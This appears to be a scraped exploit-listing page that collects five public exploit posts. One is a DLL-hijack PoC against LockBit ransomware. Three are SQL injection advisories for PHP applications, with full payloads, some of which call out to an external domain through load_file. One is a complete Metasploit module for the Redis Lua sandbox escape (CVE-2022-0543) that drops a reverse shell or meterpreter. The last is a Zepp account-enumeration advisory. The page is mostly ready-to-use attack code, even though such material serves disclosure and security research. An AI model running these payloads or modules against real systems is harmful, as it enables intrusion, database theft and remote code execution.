Latest exploits :: CodePwn

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/96de05212b30ec85d4cf03386c1b84af.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Ransom.LockBit Vulnerability: DLL Hijacking Description: LockBit ransomware looks for and executes DLLs in its current directory. This can potentially allow us to execute our own code, control and terminate the malware pre-encryption. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. All basic tests were conducted successfully in a virtual machine environment. Family: LockBit Type: PE32 MD5: 96de05212b30ec85d4cf03386c1b84af Vuln ID: MVID-2022-0572 Disclosure: 05/02/2022 Video PoC URL: https://www.youtube.com/watch?v=3i6tv4cpfSc Exploit/PoC: 1) Compile the following C code as "netapi32.dll" 2) Place the DLL in same directory as Lockbit ransomware 3) Optional - Hide it: attrib +s +h "netapi32.dll" 4) Run Lockbit PE file #include "windows.h" #include "stdio.h" //By malvuln - 5/1/2022 //Vuln: DLL Hijacking //Target: Lockbit Ransomware //MD5: 96de05212b30ec85d4cf03386c1b84af /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //gcc -c netapi32.c -m32 //gcc -shared -o netapi32.dll netapi32.o -m32 BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); TCHAR buf[MAX_PATH]; GetCurrentDirectory(MAX_PATH, TEXT(buf)); //printf("Current directory: %s\n", buf); //check the path, netapi32.dll is sideloaded by lockbit int rc = strcmp("C:\\Windows\\System32", TEXT(buf)); if(rc != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>## Title: Covid 19 Travel Pass Management System v1.0 SQLi ## Author: nu11secur1ty ## Date: 05.01.2022 ## Vendor: https://www.sourcecodester.com/users/tips23 ## Software: https://www.sourcecodester.com/php/15308/covid-19-travel-pass-management-system-phpoop-free-source-code.html ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Covid-19-Travel-Pass-Management ## Description: The `code` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+' was submitted in the code parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator accounts control and also of all accounts on this system, also the malicious user can download all information about this system. Status: CRITICAL [+] Payloads: ```mysql --- Parameter: code (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: page=view_pass&code=775545'+(select load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+'' OR NOT 7325=7325 AND 'vRQn'='vRQn Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=view_pass&code=775545'+(select load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+'' AND (SELECT 1607 FROM(SELECT COUNT(*),CONCAT(0x7171707071,(SELECT (ELT(1607=1607,1))),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'HjrM'='HjrM Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=view_pass&code=775545'+(select load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+'' AND (SELECT 2775 FROM (SELECT(SLEEP(5)))lkxH) AND 'bdqR'='bdqR Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: page=view_pass&code=775545'+(select load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+'' UNION ALL SELECT NULL,CONCAT(0x7171707071,0x584d675163465844744f504c484d4256425463675863674948566f6b68474f464f64634e6b5a596a,0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Covid-19-Travel-Pass-Management) ## Proof and Exploit: [href](https://streamable.com/huye3b) </code></pre>

<pre><code>## Title: Toll Tax Management System v1.0 SQLi ## Author: nu11secur1ty ## Date: 04.07.2022 ## Vendor: https://www.sourcecodester.com/users/tips23 ## Software: https://www.sourcecodester.com/php/15304/toll-tax-management-system-phpoop-free-source-code.html ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Toll-Tax-Management-System ## Description: The `id` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system. Status: CRITICAL [+] Payloads: ```mysql --- Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1'+(select load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+'' RLIKE (SELECT (CASE WHEN (5512=5512) THEN 0x31+(select load_file(0x5c5c5c5c6f6b63316837336d766b6b727978386c627869633479647066676c39393461733176706d636330312e6e616d61696b6174697075746b6174615f747570616b6f2e6e65745c5c777a6d))+'' ELSE 0x28 END)) AND 'XhmU'='XhmU Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1'+(select load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+'' OR (SELECT 2787 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT (ELT(2787=2787,1))),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CIPJ'='CIPJ Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1'+(select load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+'' AND (SELECT 6043 FROM (SELECT(SLEEP(5)))rrdD) AND 'XHBJ'='XHBJ Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: id=1'+(select load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+'' UNION ALL SELECT CONCAT(0x716a7a7a71,0x5346494143536a6c474b6b47466d494770794552614258734b42674c475945726d5a757674474b73,0x71626a6271),NULL,NULL,NULL,NULL,NULL# --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Toll-Tax-Management-System) ## Proof and Exploit: [href](https://streamable.com/y9xo4q) </code></pre>

<pre><code>## Title: Home Clean Service System v1.0 - 2022 SQLi ## Author: nu11secur1ty ## Date: 04.27.2022 ## Vendor: https://www.sourcecodester.com/users/acetech ## Software: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System ## Description: The `password` parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the password parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system. Status: CRITICAL [+] Payloads: ```mysql --- Parameter: MULTIPART email ((custom) POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx Content-Disposition: form-data; name="email" uufQHiPr@namaikatiputkata.net' OR NOT 6564=6564-- aWQp ------WebKitFormBoundary8kMPLwTOJeesgEBx Content-Disposition: form-data; name="password" t8I!x2y!H3' ------WebKitFormBoundary8kMPLwTOJeesgEBx Content-Disposition: form-data; name="login" ------WebKitFormBoundary8kMPLwTOJeesgEBx-- Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx Content-Disposition: form-data; name="email" uufQHiPr@namaikatiputkata.net' AND (SELECT 6279 FROM(SELECT COUNT(*),CONCAT(0x7176716271,(SELECT (ELT(6279=6279,1))),0x716a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- LSfT ------WebKitFormBoundary8kMPLwTOJeesgEBx Content-Disposition: form-data; name="password" t8I!x2y!H3' ------WebKitFormBoundary8kMPLwTOJeesgEBx Content-Disposition: form-data; name="login" ------WebKitFormBoundary8kMPLwTOJeesgEBx-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx Content-Disposition: form-data; name="email" uufQHiPr@namaikatiputkata.net' AND (SELECT 4830 FROM (SELECT(SLEEP(5)))kgBM)-- GxTm ------WebKitFormBoundary8kMPLwTOJeesgEBx Content-Disposition: form-data; name="password" t8I!x2y!H3' ------WebKitFormBoundary8kMPLwTOJeesgEBx Content-Disposition: form-data; name="login" ------WebKitFormBoundary8kMPLwTOJeesgEBx-- --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System) ## Proof and Exploit: [href](https://streamable.com/l107o6) </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::CmdStager include Msf::Auxiliary::Redis def initialize(info = {}) super( update_info( info, 'Name' => 'Redis Lua Sandbox Escape', 'Description' => %q{ This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. On a typical `redis` deployment (not docker), this module achieves execution as the `redis` user. Debian/Ubuntu packages run Redis using systemd with the "MemoryDenyWriteExecute" permission, which limits some of what an attacker can do. For example, staged meterpreter will fail when attempting to use mprotect. As such, stageless meterpreter is the preferred payload. Redis can be configured with authentication or not. This module will work with either configuration (provided you provide the correct authentication details). This vulnerability could theoretically be exploited across a few architectures: i386, arm, ppc, etc. However, the module only supports x86_64, which is likely to be the most popular version. }, 'License' => MSF_LICENSE, 'Author' => [ 'Reginaldo Silva', # Vulnerability discovery and PoC 'jbaines-r7' # Metasploit module ], 'References' => [ [ 'CVE', '2022-0543' ], [ 'URL', 'https://www.lua.org/pil/8.2.html'], [ 'URL', 'https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce' ], [ 'URL', 'https://www.debian.org/security/2022/dsa-5081' ], [ 'URL', 'https://ubuntu.com/security/CVE-2022-0543' ] ], 'DisclosureDate' => '2022-02-18', 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'Payload' => { }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'CmdStagerFlavor' => [ 'wget'], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'MeterpreterTryToFork' => true, 'RPORT' => 6379 }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']), OptString.new('LUA_LIB', [true, 'LUA library path', '/usr/lib/x86_64-linux-gnu/liblua5.1.so.0']), OptString.new('PASSWORD', [false, 'Redis AUTH password', 'mypassword']) ]) end # See https://github.com/rapid7/metasploit-framework/pull/13143 def has_check? true # Overrides the override in Msf::Auxiliary::Scanner imported by Msf::Auxiliary::Redis end # Use popen to execute the desired command and read back the output. This # is how the original PoC did it. def do_popen(cmd) exploit = "eval '" \ "local io_l = package.loadlib(\"#{datastore['LUA_LIB']}\", \"luaopen_io\"); " \ 'local io = io_l(); ' \ "local f = io.popen(\"#{cmd}\", \"r\"); " \ 'local res = f:read("*a"); ' \ 'f:close(); ' \ "return res' 0" \ "\n" sock.put(exploit) sock.get(read_timeout) end # Use os.execute to execute the desired command. This doesn't return any output, and likely # isn't meaningfully more useful than do_open but I wanted to demonstrate other execution # possibility not demonstrated by the original poc. def do_os_exec(cmd) exploit = "eval '" \ "local os_l = package.loadlib(\"#{datastore['LUA_LIB']}\", \"luaopen_os\"); " \ 'local os = os_l(); ' \ "local f = os.execute(\"#{cmd}\"); " \ "' 0" \ "\n" sock.put(exploit) sock.get(read_timeout) end def check connect # Before we get crazy sending exploits over the wire, let's just check if this could # plausiably be a vulnerable version. Using INFO we can check for: # # 1. 4 < Version < 6.1 # 2. OS contains Linux # 3. redis_git_sha1:00000000 # # We could probably fingerprint the build_id as well, but I'm worried I'll overlook at # package somewhere and it's nice to get final verification via exploitation anyway. info_output = redis_command('INFO') return Exploit::CheckCode::Unknown('Failed authentication.') if info_output.nil? return Exploit::CheckCode::Safe('Unaffected operating system') unless info_output.include? 'os:Linux' return Exploit::CheckCode::Safe('Invalid git sha1') unless info_output.include? 'redis_git_sha1:00000000' redis_version = info_output[/redis_version:(?<redis_version>\S+)/, :redis_version] return Exploit::CheckCode::Safe('Could not extract a version number') if redis_version.nil? return Exploit::CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) < Rex::Version.new('5.0.0') return Exploit::CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) >= Rex::Version.new('6.1.0') return Exploit::CheckCode::Unknown('Unsupported architecture') unless info_output.include? 'x86_64' # okay, looks like a worthy candidate. Attempt exploitation. result = do_popen('id') return Exploit::CheckCode::Vulnerable("Successfully executed the 'id' command.") unless result.nil? || result[/uid=.+ gid=.+ groups=.+/].nil? Exploit::CheckCode::Safe("Could not execute 'id' on the remote target.") ensure disconnect end def execute_command(cmd, _opts = {}) connect # force the redis mixin to handle auth for us info_output = redis_command('INFO') fail_with(Failure::NoAccess, 'The server did not respond') if info_output.nil? # escape any single quotes cmd = cmd.gsub("'", "\\\\'") # On success, there is no meaningful response. I think this is okay because we already have # solid proof of execution in check. resp = do_os_exec(cmd) fail_with(Failure::UnexpectedReply, "The server did not respond as expected: #{resp}") unless resp.nil? || resp.include?('$-1') print_good('Exploit complete!') ensure disconnect end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end end </code></pre>

<pre><code># Trovent Security Advisory 2108-02 # ##################################### User account enumeration in password reset function ################################################### Overview ######## Advisory ID: TRSA-2108-02 Advisory version: 1.0 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2108-02 Affected product: Zepp Android mobile application (com.huami.watch.hmwatchmanager) Tested versions: Zepp 6.1.4-play Vendor: Huami Inc., https://www.zepp.com Credits: Trovent Security GmbH, Karima Hebbal Detailed description #################### Zepp is a mobile application to collect health information from Zepp or Amazfit devices. Trovent Security GmbH discovered a user account enumeration vulnerability in the password reset function of the Zepp mobile application. This vulnerability allows to check if a user with a specific email address is registered or not. Severity: Medium CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) CWE ID: CWE-204 CVE ID: N/A Proof of concept ################ Sample HTTP request sent with a registered email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ DELETE /registrations/ptesttest33%40gmail.com/password?region=us-west-2&marketing=AmazFit HTTP/2 Host: api-user.huami.com App_name: com.huami.midong Accept-Language: en-US X-Request-Id: a8a25f6c-e392-4013-b39d-d8b68db532a0 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003) Accept-Encoding: gzip, deflate Content-Length: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The server response to a valid email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/2 202 Accepted Date: Mon, 30 Aug 2021 12:38:52 GMT Content-Type: application/json Content-Length: 39 Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers "HuaMi Oauth / User Registration 2.0.2" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sample HTTP request sent with a non-registered email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ DELETE /registrations/false%40gmail.com/password?region=us-west-2&marketing=AmazFit HTTP/2 Host: api-user.huami.com App_name: com.huami.midong Accept-Language: en-US X-Request-Id: a8a25f6c-e392-4013-b39d-d8b68db532a0 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003) Accept-Encoding: gzip, deflate Content-Length: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The server response to an invalid email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/2 404 Not Found Date: Mon, 30 Aug 2021 12:40:08 GMT Content-Type: application/json Content-Length: 39 Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers "HuaMi Oauth / User Registration 2.0.2" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution / Workaround ##################### Ensure the application returns a consistent message for both existent and non-existent accounts during the password reset process. History ####### 2021-08-30: Vulnerability found & advisory created 2021-09-24: Vendor contacted 2021-10-25: Vendor contacted again 2021-11-18: Vendor contacted again 2022-04-27: No reaction from vendor, advisory published </code></pre>